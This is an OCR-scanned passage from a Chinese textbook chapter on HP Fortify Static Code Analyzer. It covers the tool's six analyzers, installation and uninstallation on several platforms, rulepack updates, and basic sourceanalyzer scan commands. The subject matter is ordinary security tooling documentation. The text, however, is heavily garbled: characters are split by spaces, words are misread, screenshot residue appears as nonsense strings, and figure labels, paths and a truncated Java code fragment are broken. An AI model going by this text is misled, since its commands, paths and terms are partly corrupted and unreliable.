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本 章 主要 介绍 了 代码 安全 静态 分 析 的 基本 概念 以 及 代码 审查 中 的 静态 分 析 ， 其 中 ， 代 码 
安全 静态 分 析 的 基本 概念 部 分 还 对 静态 分 析 存 在 的 局 限 性 和 其 所 能 解决 的 问题 进行 了 重点 并 
述 。 男 外 ， 本 章 还 着 重 介绍 了 静态 分 析 的 过 程 和 该 过 程 中 经 常 出 现 的 问题 ， 静 态 分 析 过 程 包 
括 建 模 、 分 析 算 法 、 规 则 以 及 报告 结果 ， 而 该 过 程 中 经 常 出 现 的 问题 则 包括 处 理 输入 、 缓 冲 
区 溢出 的 分 类 、 错 误 和 异常 等 。 静 态 分 析 在 软件 测试 中 占有 十 分 重要 的 地 位 ， 它 不 仅 关 系 着 
程序 员 编 程 的 规范 性 , 更 关系 着 整个 程序 的 安全 性 。 本 节 最 后 将 软件 漏洞 作为 一 个 单元 提出 ， 
目的 在 于 分 析 软 件 漏洞 所 涉及 的 各 种 问题 。 


第 5 章 HP Fortify 工 具 使 用 


本 章 导 读 

Fortify 静态 代码 分 析 器 (Static Code Analyzer) 是 HP Fortify 公司 开发 的 一 个 静态 的 、 白 盒 
的 软件 源 代 码 安全 测试 工具 。 它 通过 内 置 的 五 大 主要 分 析 引 擎 对 应 用 软件 的 源 代码 进行 静态 
分 析 ， 期 间 与 它 特 有 的 软件 安全 漏洞 规则 集 进 行 全面 匹 配 ， 从 而 将 源 代 码 中 存在 的 安全 漏洞 
扫描 出 来 ， 并 提供 整理 报告 和 修改 建议 。 

另外 ， 本 章 还 将 介绍 实时 安全 分 析 器 (RTA) 和 程序 跟踪 分 析 器 (PTA) 的 基本 知识 。 

应 掌握 的 知识 要 点 : 

* HP Fortify 静态 代码 分 析 器 的 主要 特征 

e 软件 安装 

e 静态 代码 分 析 器 分 析 原 理 

e 静态 代码 分 析 器 分 析 过 程 

e 静态 代码 分 析 器 扫描 的 方式 

。 静态 代码 分 析 器 转换 源 代码 

* Audit Workbench 用 户 指南 

。 Fortify SCA 安全 报告 分 析 

e 实时 安全 分 析 器 基本 知识 

e 程序 跟踪 分 析 器 基本 知识 


5.1 HP Fortify 静态 代码 分 析 器 的 主要 特征 


5.1.1 Fortify SCA 概述 


Fortify SCA (Static Code Analyzer) 是 一 组 软件 安全 分 析 器 , 能 够 在 多 种 语言 中 搜索 那些 违 
背 安全 编码 规则 和 指导 原则 的 情况 。 由 Fortify SCA. 提供 的 丰富 数据 能 够 使 这 些 分 析 器 查 明 违 
背 规则 的 情况 并 将 其 分 级 ， 从 而 可 以 快速 准确 地 进行 修复 。 这 样 不 仅 可 以 提供 更 安全 的 软件 
产品 ， 还 有 助 于 使 安全 代码 的 检查 更 加 有 效 、 一 致 和 完整 ， 特 别 是 涉及 大 型 代码 库 的 情况 。 
模块 化 的 体系 结构 能 够 快速 地 上 传 新 的 、 第 三 方 的 以 及 客户 指定 的 安全 规则 。 

概括 来 讲 ， 使 用 Fortify SCA 会 涉及 以 下 操作 : 

1. (可 选 操作 ) 将 Fortify SCA 集成 到 构建 过 程 中 。 
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2. 针对 代码 库 执行 分 为 两 个 阶段 的 分 析 过 程 ， 最 后 生成 一 份 安全 漏洞 报告 。 
3. (可 选 操作 ) 将 结果 传送 到 Audit Workbench 和 Fortify Team Server， 进 行 分 析 与 检查 。 


5.1.2 ”分析 器 概述 


Fortify SCA 包含 6 个 不 同 的 分 析 器 : 数据 流 分 析 器 、 控 制 流 分 析 器 、 语 义 分 析 器 、 结 构 
分 析 器 、 配 置 分 析 器 以 及 缓冲 分 析 器 。 每 个 分 析 器 均 会 接受 不 同类 型 的 规则 ， 该 规则 经 过 特 
殊 定 制 ， 针 对 不 同类 型 的 分 析 提 供 相 应 的 信息 。 规 则 是 指 用 来 识别 源 代 码 中 可 能 引发 安全 漏 
洞 或 其 他 不 安全 因素 的 各 种 元 素 的 定义 。 规 则 根据 所 适用 的 分 析 器 进行 划分 ， 于 是 就 产生 了 
针对 数据 流 分 析 器 、 控 制 流 分 析 器 、 语 义 分 析 器 、 结 构 分 析 器 、 配 置 分 析 器 以 及 缓冲 分 析 器 


的 各 种 规则 。 
K 5-1 多 


控制 流 


语义 


结构 


配置 


规则 类 型 还 可 以 进一步 划分 ， 以 反映 问题 的 类 别 或 者 规则 所 代表 的 信息 类 型 。 
出 Fortify 中 上 述 6 种 分 析 器 。 


表 5-1_Fortify 源 代码 分 析 器 
描述 

数据 流 分 析 器 可 检测 那些 将 “被 感染 数据 ”( 用 户 控制 的 输入 ) 用 于 危险 用 途 的 潜在 漏洞 。 
数据 流 分 析 器 使 用 全 局 的 、 程 序 间 的 感染 传播 分 析 方法 来 检测 source( 用 户 输入 的 站 点 ) 
与 sink (危险 的 函数 调用 或 者 操作 ) 之 间 的 数据 流 。 例 如 ， 数 据 流 分 析 器 可 以 检测 一 个 用 
户 控制 的 特别 长 的 字符 串 输入 是 否 正在 被 复制 到 一 个 固定 长 度 的 缓冲 区 中 ， 还 可 以 检测 
一 个 用 户 控制 的 字符 串 是 否 正 被 用 来 构建 SQL 查询 文本 
控制 流 分 析 器 可 以 检测 存在 潜在 危险 的 操作 执行 顺序 。 通 过 分 析 程 序 中 的 控制 流 路 径 ， 
控制 流 分 析 器 能 确定 在 执行 一 系列 操作 时 是 否 遵循 了 特定 的 顺序 。 例 如 ， 控 制 流 分 析 可 
以 检测 check/time 的 时 间 和 未 经 初始 化 的 变量 ， 并 检查 实用 程序 (如 XML 阅读 器 ) 是 否 
在 使 用 前 做 了 正确 配置 
语义 分 析 器 可 在 程序 内 部 这 个 层面 检测 可 能 会 引发 潜在 危险 的 函数 和 API 的 各 种 使 用 
情况 。 其 特定 的 逻辑 会 搜索 buffer overflow. format string 和 各 种 执行 路 径 的 问题 ， 但 并 
不 局 限于 这 几 个 类 别 。 任 何 存在 潜在 危险 的 函数 调用 都 可 以 通过 语义 分 析 器 进行 标记 。 
例如 ， 语 义 分 析 器 可 以 检测 Java 中 的 过 时 函数 和 C/C++ 中 的 不 安全 函数 ， 如 gets0 
结构 分 析 器 可 以 检测 可 能 存在 危险 的 结构 缺陷 或 程序 定义 。 通 过 理解 程序 的 构建 方式 ， 
结构 分 析 器 能 够 识别 出 安全 编程 实践 中 违反 规则 的 各 种 情况 以 及 通常 难以 被 检测 到 的 
技术 ， 原 因 是 这 些 技术 涉及 的 范围 很 广 ， 其 中 包括 有 关 声 明 变 量 和 函数 调用 。 例 如 ， 结 
构 分 析 器 能 检测 在 JavaServlets 中 成 员 变 量 的 赋值 , 识别 未 被 声明 为 static final 的 记录 器 
的 使 用 ， 并 标记 那些 由 于 被 断言 为 错误 而 永 不 被 执行 的 dead code 实例 
配置 分 析 器 可 在 应 用 程序 的 配置 文件 中 搜索 错误 、 缺 陷 和 违反 规则 的 策略 漏洞 。 例 如 ， 
配置 分 析 器 可 检查 网 络 应 用 程序 的 某 一 用 户 的 会 话 超时 配置 


缓冲 


缓冲 分 析 器 检测 缓冲 区 溢出 漏洞 ， 其 中 漏洞 涉及 写 、 读 的 数据 比 缓冲 区 可 以 保存 的 数据 
更 加 丰富 。 缓 冲 区 可 以 基于 栈 分 配 或 堆 分 配 。 缓 冲 分 析 器 使 用 层 间 分 析 来 确定 是 否 有 一 
个 条 件 导致 缓冲 区 溢出 。 如 果 所 有 通 入 缓冲 区 的 执行 路 径 都 导致 缓冲 区 溢出 ，SCA 会 报 
告 这 是 缓冲 区 溢出 漏洞 并 指出 导致 漏洞 的 变量 。 一 旦 有 通 往 缓冲 区 的 执行 路 径 导 致 缓冲 
区 溢出 或 变量 值 导 致 缓冲 区 溢出 问题 (用 户 辅助 控制 )，SCA 会 对 数据 流 进行 跟踪 并 在 报 
告 中 显示 变量 是 如 何 缓冲 区 溢出 的 


第 5 章 HPFortify 工具 使 用 . 147° 


S2 ”软件 安装 


5.2.1 安装 组 件 概述 


Fortify SCA 安装 包含 下 列 一 个 或 多 个 组 件 : 

* Audit Workbench 

* Fortify SCA 

* Fortify Team Server 

* Eclipse3* 安全 编码 插件 

* 用 于 Microsoft Visual Studio 2003 的 安全 编码 包 

。 用 于 Microsoft Visual Studio 2005 的 安全 编码 包 

从 Fortify SCA 5.0 开始 ，Developer、Team 和 Enterprise 版 本 不 再 包含 以 上 组 件 。 


522 下载 软件 


Fortify SCA 软件 和 许可 证 文件 可 从 Fortify Customer Portal 下 载 。 用 户 会 收 到 包含 客户 
账户 信息 (如 用 户 名 和 密码 ) 的 确认 邮件 。 

Fortify Customer Portal 的 URL 为 https://customerportal fortify.com。 

将 软件 包 ( 包 括 许 可 证 文件 ) 下 载 到 硬盘 。 还 可 从 Fortify Customer Portal 下 载 安全 编码 规 
则 包 ， 然 后 使 用 规则 包 更 新 工具 来 更 新 安全 编码 规则 包 。 该 选项 专 为 那些 在 安装 期 间 无 法 访 
问 Internet 站 点 的 用 户 提供 。 


5.2.3 安装 Fortify SCA 


1. 安装 选项 

Windows MSI 安装 程序 可 安装 以 下 任意 (及 所 有 ) 组 件 : Fortify SCA sourceanalyzer、 
AuditWorkbench、 用 于 基于 Eclipse 的 IDE 的 安全 编码 插件 、 用 于 Visual Studio 的 安全 编码 包 
以 及 Fortify Team Server Web. 应 用 程序 。 

Linux TAR 文件 可 安装 以 下 组 件 : 

* Fortify SCA 

® Sourceanalyzer 

* Fortify SCA 套件 

® Sourceanalyzer 

® Audit Workbench 

* Eclipse 安全 编码 插件 
于 安装 Eclipse 3+ 安 全 插件 的 选项 可 安装 所 有 基于 Eclipse 的 IDE 插件 ， 但 用 于 IBM 
WebSphere Studio Application Developer 5 的 插件 除外 。 

* Fortify Team Server 
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* Team Server Web 应 用 程序 


如 果 使 有 


gi 


的 Linux 平台 正在 运行 安全 增强 版 的 kemel (SELinux)， 则 可 能 无 法 完成 安装 进 
除非 禁用 此 项 服务 。 安 装 结束 后 ， 可 重新 启用 该 服务 。 


Mac OS X DMG 文件 可 安装 以 下 组 件 : 


* Fortify SCA 

* Sourceanalyzer 

* Fortify SCA 套件 
* Sourceanalyzer 

* Audit Workbench 


。 用 于 基于 Eclipse 的 IDE 的 源 代码 插件 
用 于 安装 Eclipse 3+ 安 全 插件 的 选项 可 安装 所 有 基于 Eclipse 的 IDE 插件 ， 但 用 于 IBM 
WebSphere Studio Application Developer 5 的 插件 除外 : 


* Fortify Team Server 


* Team Server Web 应 用 程序 
UNIX TAR 文件 可 安装 以 下 组 件 : 


* Fortify SCA 
* Sourceanalyzer 
* Fortify Team Server 


* Team Server Web 应 用 程序 


2. 在 Windows 上 安装 


在 Windows 上 ， 使 用 InstallShield 向 导 应 用 程序 来 引导 安装 。 


安装 Fortify SCA: 


1) 导航 至 包含 下 载 软件 的 目录 ， 如 图 5-1 所 示 。 


mm 


— — —H À— 9 —— 


~ ——À — = = 
O [è « Tppowhtoap，hp rorify SCA and Apps 410 Windows TF302-15179 Y 


Ter aere rom 


文昌 SURE) SEV IAD #96 
mae- naast- 共享 ~ 
m aum 
H eame 


aR mes 
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2) 双击 installexe, n 5-2 所 示 。 
| 


Setup — WP Fortify SCA and 
Applications 4.10 


IE Setup x o 


Welcome to the HP Fortify SCA and 
Applications 4.10 Setup Wizard. 


< Back 


图 5-2 installexe 启动 界面 


3) 单 击 Next 并 接受 许可 证 协议 ， 如 图 5-3 所 示 。 
Fee oo. o a M [= ew | 


License Agresaent [FORTIFY 


Please read the following License Agreement. You must accept the terms of this 
agreement before continuing with the installation. 


This end user license agreement (the 


[CT 
Agreement") governs the use of accompanying software, unless it |] 
int between you and Hewlett-Packard | 
RP. By dewmicading, copying, or 
io sia agresmnt. EP provides 
| Agrsamaar in eartaim languages oshar tham 
agian, which may e found et:  htrpi//www hp.com /go/SiLicemaing 
| a 
l ue © [I accept the agreement 
Do you accept this license? 
I do not accept the agreement. 
| : 
\ [mer rm [rn 


图 5-3 许可 证 协议 界面 
4) 选择 安装 路 径 ， 如 图 5-4 所 示 。 


Installation Directory (EoRTIEY 


Please specify the directory where HP Fortify SCA and Applications 4.10 will be 
installed. 


Installation Directoy EEEE 


图 5-4 安装 路 径 界面 
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5) 选择 要 安装 的 组 件 ， 如 图 5-5 所 示 。 
pies TI 


pU [FORTIFY 


Select the components you want to install; clear the components you do not want 
to install. Click Next when you are ready to continue. 


[4! Click on a component to get a 
detailed description 


H7] Eclipse 

H7] Eclipse Remediation E. 
HF] Visual Studio 2010 Comole| =] 
C à] Im] 


<Back || Next> Cancel 


-—RÓ = 


图 5-5 选择 安装 组 件 


6) 选择 安装 许可 证 位 置 ， 如 图 5-6 所 示 。 
[Es aa u ~e 


Fortify License Location (FoRTIEY 


|| Please give the full path to fortifylicense 


| Full path to fortifylicense | HAFortify SCAVortify license & 


图 5-6 选择 许可 证 路 径 


7) 选择 Rulepack 位 置 ， 单 击 Next， 如 图 5-7 所 示 。 
Esu PE le 


pe der Security astene FernFY 


Please provide the server settings for security content updates. 


Update server URL 


Proxy (Optional) 
Proxy host 


Proxy port 


| [<Back |[ Nea» |[ Cancel 


5-7 选择 I€— 位 置 
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8) 确定 SCA 移 除 选 项 ， 单 击 Next， 如 图 5-8 所 示 。 


Elisewp 0 - [T 
sea migration [FORTIFY 


This setup can help you migrate from previous SCA installation. 


Do you want to migrate from a previous SCA installation? 
Yes 
© No 


[ <Back |[ Nec» )[ Came 


图 5-8 选择 SCA 移 除 


9) 准备 安装 ， 如 图 5-9 所 示 。 


Du M CI ew 
Ready to Install Í FORTIFY’ 


Setup is now ready to begin installing HP Fortify SCA and Applications 4.10 on 
your computer. 


[ <Back ][ Wer» |][ Cancel 


图 5-9 准备 安装 界面 


10) 安装 完成 ， 如 图 5-10 所 示 。 


r "n 
F Setup i à jesa 


Completing the HP Fortify SCA and 


| 65 | Applications 4.10 Setup Wirard 


Setup has finished installing HP Fortify SCA and 
Applications 4.10 on your computer. 


M [7] Update security content after installation? 


< Back 


Cancel | 


图 5-10 ”安装 完成 界面 


.151° 


*152* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


11) 核实 下 载 的 Rulepacks， 如 图 5-11 所 示 。 


Storing Updated Security Content ,,, 

C:\Program Filesl HP Fortify\HP Fortify SCA 
v3.70lCorelconfiglrules 

Fortify Secure Coding Rules, Core, C/C++ v2012.3.0.0008 
Fortify Secure Coding Rules, Core, ActionScript 3.0 
v2012.3.0.0008 

Fortify Secure Coding Rules, Core, COBOL v2012,3.0.0008 
Fortify Secure Coding Rules, Core, Java v2012.3.0.0008 
Fortify Secure Coding Rules, Core, ABAP v2012.3.0.0008 
Fortify Secure Coding Rules, Core, Python v2012.3.0.0008 
Fortify Secure Coding Rules, Core, Objective-C v2012.3.0.0008 
Fortify Secure Coding Rules, Extended, SQL v2012.3.0.0008 
Fortify Secure Coding Rules, Extended, Configuration 
v2012.3.0.0008 

Fortify Secure Coding Rules, Extended, Java v2012.3.0.0008 
Fortify Secure Coding Rules, Core, SQL v2012.3.0.0008 

Fortify Secure Coding Rules, Core, ColdFusion v2012.3.0.0008 
Fortify Secure Coding Rules, Extended, Content v2012,3.0.0008 
Fortify Secure Coding Rules, Core, PHP v2012.3.0.0008 

Fortify Secure Coding Rules, Extended, C/C++ v2012,3,0,0008 
Fortify Secure Coding Rules, Core, Classic ASP, VBScript, and VB6 
v2012.3.0.0008 

Fortify Secure Coding Rules, Extended, ,NET v2012.3.0.0008 
Fortify Secure Coding Rules, Extended, JSP v2012.3.0.0008 
Fortify Secure Coding Rules, Core, JavaScript v2012.3.0.0008 
Fortify Secure Coding Rules, Core, Annotations v2012.3.0.0008 
Fortify Secure Coding Rules, Core, ,NET v2012.3.0.0008 
Fortify Secure Coding Rules, Core, Android v2012.3.0.0008 
Removing Old Metadata Files ,,, 

C:\Program Files\HP Fortify\HP Fortify SCA 
v3.70|CorelconfigExternalMetadata. 

Main External List Mappings v2012.3.0.0009 

Storing Updated Metadata Files .. 

C:\Program Files|HP Fortify\HP Fortify SCA 
v3.70|CorelconfiglExternalMetadata. 

Main External List Mappings v2012.3.0.0009 


图 5-11 核实 下 载 的 Rulepacks 
12) 执行 “sourceanalyzer -v” 验 证 安装 ， 如 图 5-12 所 示 。 


elect Command Prompt E 


图 5-12 验证 


装 


13) HP Fortify 会 自动 加 入 到 MS 或 VS 中 ， 如 图 5-13 所 示 。 


29 Start Page - Microsoft Visual Studio 


图 5-13 MS 中 的 HPFortify 插件 
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14) 安装 Eclipse, XF% Help/Install New Software， 如 图 5-14 所 示 。 


E Java - Edipse 


Fie Edt Source Refactor Navigate Search Project Run Window | Help 


= ]*-0-Q-|& Gg- |i c Owm 
y Search 
Dynamic Help. 
E Report Bug or Enhancement... 


Check for Updates 


About Edipse 


图 5-14 选择 安装 新 软件 


15) 选择 <Fortify install>/plugins/eclipse 并 单 击 OK， 如 图 5-15 所 示 。 
[E Ada Repository x 


Name: [HP Fortify v3.70 la | 
Location: | file:/C:/Program Files/HP Fortify/HP Fortify SCA v3.7 — Archive... 


@ [E | 
图 5-15 ”安装 插件 路 径 界 面 


16) 选择 组 件 并 单 击 Next， 如 图 5-16 所 示 。 
aix 
Available Software 
Check the items that you wish to install, Ja 


Workwith: | HP Fortify v3.70 - file:/C:/Program Files/HP Fortify/HP Fortify SCA v3.70/plugins/eclipse. -l Add... 


Find more software by working with the "Available Software Sites" preferences. 


type fiter text 


Name 
Ei [000 Fortify Eclipse Plugins 


Ed 4» Fortify Analysis Plugin for Eclipse 370.0 
[214 Fortify Audi Plugin for Eclipse. 3.70.0 


Select All Deselect All | 2 items selected 


| 4 
Iv. Show only the latest versions of available software. T^ Hide items that are already installed. 


IV. Group items by category What is already installed? 
TV. Contact all update sites during install to find required software. 


加 N | 


图 5-16 选择 组 件 界面 
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17) 确定 安装 组 件 并 单 击 Next， 如 图 5-17 所 示 。 


Install Details 
Review the items to be installed. 


TẸ Fortfy Analysis Plugin for Eclipse 70. com fortify.plugin. analysis. feature. g. 
日 Fortífy Audit Plugin for Ecipse .70. com fortify.dev.ide. eclipse festure.g... 
日 3 Edipse Java Development Tools « org.edipse.jdt.feature.group 
日 $3 Ecipse Platform org.ecipse.platform.feature.group. 
QP Edipse Help System org. eclipse. help.feature.group. 
A Edipse RCP r org.edipse.rcp.feature.group 
M Equinox p2 Provisioning .0.1./361 v20... org.ecipse.equinox.p2.user.ui.featu.. 


图 5-17 确定 组 件 界面 


18) 阅读 并 接受 许可 证 ， 单 击 Next， 如 图 5-18 所 示 。 
[Es om E -4pi xi 


Review Licenses 
Licenses must be reviewed and accepted before the software can be installed. 


Licenses: License text: 
Eclipse Foundation Software User Agreement 


Edipse Foundation Software User Agreement 
& END USER LICENSE AGREEMENT April 14, 2010 


Usage Of Content 


THE ECLIPSE FOUNDATION MAKES AVAILABLE. 
SOFTWARE, DOCUMENTATION, INFORMATION 
JOR 


OTHER MATERIALS FOR OPEN SOURCE PROJECTS 
(COLLECTIVELY "CONTENT"). 

USE OF THE CONTENT I5 GOVERNED BY THE TERMS 
AND CONDITIONS OF THIS 

AGREEMENT AND/OR THE TERMS AND CONDITIONS 


GOVERNED BY THIS AGREEMENT 

AND/OR THE TERMS AND CONDITIONS OF ANY 
APPLICABLE LICENSE AGREEMENTS 

OR NOTICES INDICATED OR REFERENCED BELOW. 
IF YOU DO NOT AGREE TO THE 

TERMS AND CONDITIONS OF THIS AGREEMENT 
AND THE TERMS AND CONDITIONS. 

OF ANY APPLICABLE LICENSE AGREEMENTS OR 
NOTICES INDICATED OR REFERENCED 


他 Iaccept the terms of the license agreements 
(C. 1 do not accept the terms of the license agreement 


«ee | ss [Imm] ce 
图 5-18 阅读 接受 许可 证 界面 
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19) 重启 Eclipse， 如 图 5-19 所 示 。 


€- software Updates x| 


You will need to restart Eclipse for the installation changes to take effect. You 
may try to apply the changes without restarting, but this may cause errors. 


图 5-19 重启 Eclipse 
20) HP Fortify 已 被 加 入 到 Eclipse， 如 图 5-20 所 示 。 


EE Java - Eclipse 


Edit Source Refactor Navigate Search Project Run | HP Fortify Window Help 
| E | 3s - o 四 Q - | & G F Analyze Project 
x 


Show Project Summary 

Audit Guide 

Project Configuration 
IE Generate Report ... 

Configure Upload... 
fini upload Audit Project 


Export Audit Project ... 
wi save Audit Project 


Open Collaborative Audit ,, 
Open Audit Project s 
Merge Audit Projects s 

P) Load Saved Audit Project 
Manage License 


图 $-20 “安装 完成 插件 
3. 在 Linux 上 进行 安装 
安装 Fortify SCA: 
1) 导航 至 包含 下 载 软件 的 目录 。 
2) 打开 一 个 shell 窗口 ， 并 通过 提示 输入 以 下 命令 来 提取 文件 : 


gunzip<archive name>.tgz 
tar -xvf <archive name>.tar 


3) 有 关 以 下 主题 的 信息 ， 请 参见 “后 续 安 装 任务 ”: 
。 从 之 前 版 本 中 迁移 属性 文件 ; 

。 为 代理 规则 包 更 新 服务 器 指定 连接 信息 : 

。 指定 一 种 非 英 文 的 语言 环境 ; 


© 运行 Rulepack Updater. 
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4. 在 UNIX 上 进行 安装 


安装 Fortify SCA: 
1) 导航 至 包含 下 载 的 软件 的 目录 。 
2) 打开 一 个 shell 窗口 并 通过 输入 以 下 命令 来 提取 文件 : 


gunzip<archive name>.tgz 
gtar -xvf «archive name>.tar 


3) 有 关 以 下 主题 的 信息 ， 请 参见 “后 续 安 装 任务 ”: 
。 从 之 前 版 本 中 迁移 属性 文件 ; 

。 为 代理 规则 包 更 新 服务 器 指定 连接 信息 ; 

。 指定 一 种 非 英 文 语言 环境 ; 

。 运行 Rulepack Updater。 

5. 在 Mac OS X 上 进行 安装 


安装 Fortify SCA: 

1) 导航 至 包含 下 载 软件 的 目录 。 

2) 双击 DMG 文件 。 

系统 会 创建 一 个 虚拟 驱动 器 ， 其 中 包含 产品 文件 夹 。 

3) 将 文件 夹 复制 并 粘贴 至 选择 的 安装 位 置 ， 如 下 例 所 示 : 


/Applications/Fortify Software/... 


4) 有 关 以 下 主题 的 信息 ， 请 参见 “后 续 安装 任务 ”: 

。 从 之 前 版 本 中 迁移 属性 文件 ; 

e 为 代理 规则 包 更 新 服务 器 指定 连接 信息 ; 

。 指定 一 种 非 英文 语言 环境 ; 

。 运行 Rulepack Updater. 

注意 : 要 在 Mac OS X PÈZ) Audit Workbench， 请 在 终端 窗口 中 输入 以 下 命令 : 


# cd /Applications/Fortify Software/Fortify-SCA-5.0/bin 
# ./auditworkbench 


6. 安装 Eclipse 安全 编码 插件 


安装 基于 Eclipse 的 IDE: 

1) 按照 上 述说 明 安 装 Fortify SCA 套件 。 

注意 : 对 于 Windows 平台 来 说 ， 请 确保 在 安装 期 间 选 择 了 Eclipse 3x 选项 。 

2) 打开 Eclipse。 

3) 选择 Help (帮助 )， 再 依次 选择 Software Updates( 软 件 更 新 ) 和 Manage Configuration 
Location( 管 理 配置 位 置 )。 

4) 单 击 Add an Extension Location( 添 加 扩展 位 置 )。 


第 5 章 HPFortify 工具 使 用 *157* 


5) 选择 <install directory-/plugins/eclipse . 
6) 单 击 OK (确定 )。 
屏幕 上 将 显示 Fortify Software 安全 编码 插件 菜单 。 


524 “后续 安装 任务 


本 节 将 介绍 如 何 升级 安全 编码 规则 包 ， 如 何在 升级 之 后 迁移 属性 文件 、 指 定 不 同 的 语言 
环境 、 为 规则 包 更 新 服务 器 指定 不 同 的 URL. 以 及 为 规则 包 更 新 服务 器 指定 一 个 代理 服务 器 。 

升级 规则 包 在 “更 新 规则 包 ” 中 有 所 描述 。 余 下 的 任务 是 使 用 后 续 安装 工具 ， 相 关内 容 
在 “运行 后 续 安 装 工具 ”中 有 所 描述 。 

1. 运行 后 续 安装 工具 

1) 在 命令 行 中 ， 导 航 至 bin 目录 。 

2) 输入 scapostinstall 以 启动 该 工具 。 

3) 选择 所 需 选 项 并 输入 相关 值 以 执行 以 下 任务 。 

。 迁移 属性 文件 ; 

。 指定 语言 环境 ; 

。 为 Rulepack Updates 指定 一 个 代理 服务 器 。 

4) 输入 s 显示 设置 ， 输入 r 返回 前 面 的 提示 ， 输 入 q 退出 该 工具 。 

2. 迁移 属性 文件 

将 早期 版 本 中 更 改过 的 属性 文件 迁移 到 当前 版 本 : 

启动 后 续 安装 工具 。 

1) 输入 1 选择 Migration. 

2) 输入 1 选择 SCA Migration. 

3) 输入 1 选择 Set previous migration directory 

4) 输入 之 前 的 安装 目录 

5) 输入 s 确认 设置 。 

6) 输入 2 执行 迁移 。 

7) 输入 y 进 行 确认 。 

3. 指定 语言 环境 

默认 情况 下 ，Fortify Source Code Analysis 的 安装 环境 为 英文 。 

指定 一 个 不 同 的 环境 : 

1) 启动 后 续 安装 工具 。 

2) 输入 2 选择 Settings. 

3) 输入 1 选择 General. 

4) 输入 1 选择 Locale。 

5) 输入 环境 代码 : 
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英文 : en 
HX: ja 
韩文 : ko 
简体 中 文 : zh CN 
繁体 中 文 : zh_TW 


4. 为 Rulepack Updates 指定 一 个 代理 服务 器 


为 rulepack update 服务 器 指定 一 个 代理 : 

1) 启动 后 续 安装 工具 。 

2) 输入 2 选择 Settings。 

3) 输入 2 选择 Rulepack Update... 

4) 输入 2 选择 Proxy Server Host. 

5) 输入 代理 服务 器 的 名 称 。 

6) 输入 3 选择 Proxy Server Port. 

7) 输入 代理 服务 器 的 端口 号 。 

更 新 规则 包 使 用 Rulepack Update 工具 ， 从 远程 服务 器 或 本 地 下 载 的 文件 中 更 新 规则 包 。 
有 关 下 载 规则 包 的 信息 ， 请 参见 “下 载 软件 ”。 

5. 更 新 规则 包 


1) 在 命令 行 中 ， 导 航 至 bin 目录 。 

2) 输入 rulepack update 以 启动 该 工具 。 

系统 会 响应 操作 ， 可 能 会 显示 一 个 错误 消息 ， 也 可 能 显示 一 个 已 下 载 的 规则 包 列 表 。 

注意 : 本 版 本 不 支持 从 Fortify Manager 中 下 载 规则 包 。 

如 果 具 有 之 前 从 Fortify Customer Portal 下 载 的 规则 包 ， 请 运行 带 有 -import 的 
rulepackupdate 选项 ， 以 及 已 下 载 的 规则 包 的 目录 路 径 。 


5.2.5 ”卸载 Fortify SCA 


1. 在 Windows 平台 上 进行 卸载 

SERIA Windows 上 的 Forify SCA 软件 ， 请 使 用 “控制 面板 ”上 的 “Windows 添加 或 删 
1) 选择 开始 一 控制 面板 一 添加 或 删除 程序 一 Fortify SCA 5.0。 

2) 在 Fortify SCA 5.0 下 ， 单 击 Delete( 删 除 )。 

2. 在 其 他 平台 上 进行 卸载 


TE Mac OS X, Linux 和 UNIX ^ £& E38 Fortify SCA 软件 : 
1) 备份 配置 ， 包 括 创建 的 所 有 重要 文件 。 
2) 使 用 以 下 命令 手动 删除 安装 目录 : 


rm -rf «install directory»/FortifySCA 
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5.3 ”静态 代码 分 析 器 分 析 原 理 


5.3.1 分 析 阶 段 概述 


源 代 码 分 析 过 程 包含 下 列 几 个 阶段 : 

构建 集成 :该 阶段 确定 是 否 需 要 将 SCA 集成 到 构建 编译 程序 。 

。 转换 : 通过 一 系列 命令 聚集 起 来 的 源 代码 会 被 转换 为 一 个 与 build id 相关 联 的 中 间 格 
式 ， 该 构建 build id 通常 就 是 正在 扫描 的 项 目的 名 称 。 

。 分 析 : 系统 将 扫描 在 转换 阶段 识别 出 的 源 文 件 ， 随 后 生成 一 个 分 析 结 果 文件 ， 该 文 
件 通常 为 Fortify 项 目 (FPR) 格 式 。FPR 文件 以 “fpr 扩展 名 表示 。 

。 对 转换 和 分 析 阶 段 的 验证 : 确保 源 文件 的 扫描 使 用 了 正确 的 规则 包 ， 而 且 没有 报告 
重大 错误 。 


5.82 ”分析 命令 示例 
以 下 示例 用 来 分 析 代 码 的 命令 序列 : 


® >sourceanalyzer -b <build id> -clean 

* >sourceanalyzer -b <build id>... 

e >sourceanalyzer -b <build id^ -scan -f results.fpr 

如 果 需 要 同时 分 析 多 个 build id， 可 以 添加 额外 的 构建 作为 参数 : 


sourceanalyzer -b <build idl^ -b <build id2> -b «build id3> -scan -f results. fpr 


5.3.3 ”内 存 注意 事项 


SCA 运行 时 ， 所 需 的 物理 RAM 取决 于 许多 因素 。 因 为 每 个 客户 情况 都 是 不 同 的 ， 一 些 
因素 (包括 源 文件 的 大 小 和 复杂 性 )， 使 其 无 法 量化 。 如 果 你 遇 到 一 个 低 内 存 错误 ， 增 加 SCA 
可 用 内 存 可 能 会 解决 问题 。 

默认 情况 下 ，Fortify SCA 最 多 可 使 用 600 MB 的 内 存 。 如 果 该 内 存 仍 不 能 满足 分 析 某 个 
特定 代码 库 的 需要 , 可 能 需要 在 扫描 阶段 提供 更 多 的 内 存 。 这 可 以 通过 在 sourceanalyzer 命令 
中 使 用 -Xmx 选项 来 实现 。 例 如 ， 要 让 Fortify SCA 可 用 的 内 存 达 到 1000 MB， 可 在 命令 中 包 
含 -Xmx1000M 选项 。 

注意 ， 为 Fortify SCA 分 配 的 内 存 不 应 高 于 计算 机 本 身 的 可 用 内 存 ， 因 为 这 样 会 降低 性 
能 。 指 导 原则 是 在 没有 运行 其 他 内 存 密 集 型 程序 的 情况 下 ， 为 其 分 配 的 内 存 不 能 超过 2/3 的 
可 用 物理 内 存 。 
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} 


import java.sgl.*; 


public class SQLIn 
public static voi 


5.4 ”静态 代码 分 析 器 的 分 析 过 程 


图 5-21 显示 了 分 析 过 程 。 


Fortify Global. 
Analysis 


| 
3 
| 
] 
] 
] 


[Secure Coding Rules] 

| Fortify Customized 
Rules | 

| 

| 


图 5-21 分析 过 程 


静态 代码 分 析 器 的 分 析 过 程 是 由 分 析 器 和 规则 组 成 的 。 

1) 分 析 器 

包括 6 个 独立 的 分 析 器 (分 析 器 是 静态 分 析 方法 ); 

每 个 分 析 器 由 相应 的 规则 类 型 相互 联系 起 来 。 

2) 规则 

对 于 易 损 点 的 定义 ; 

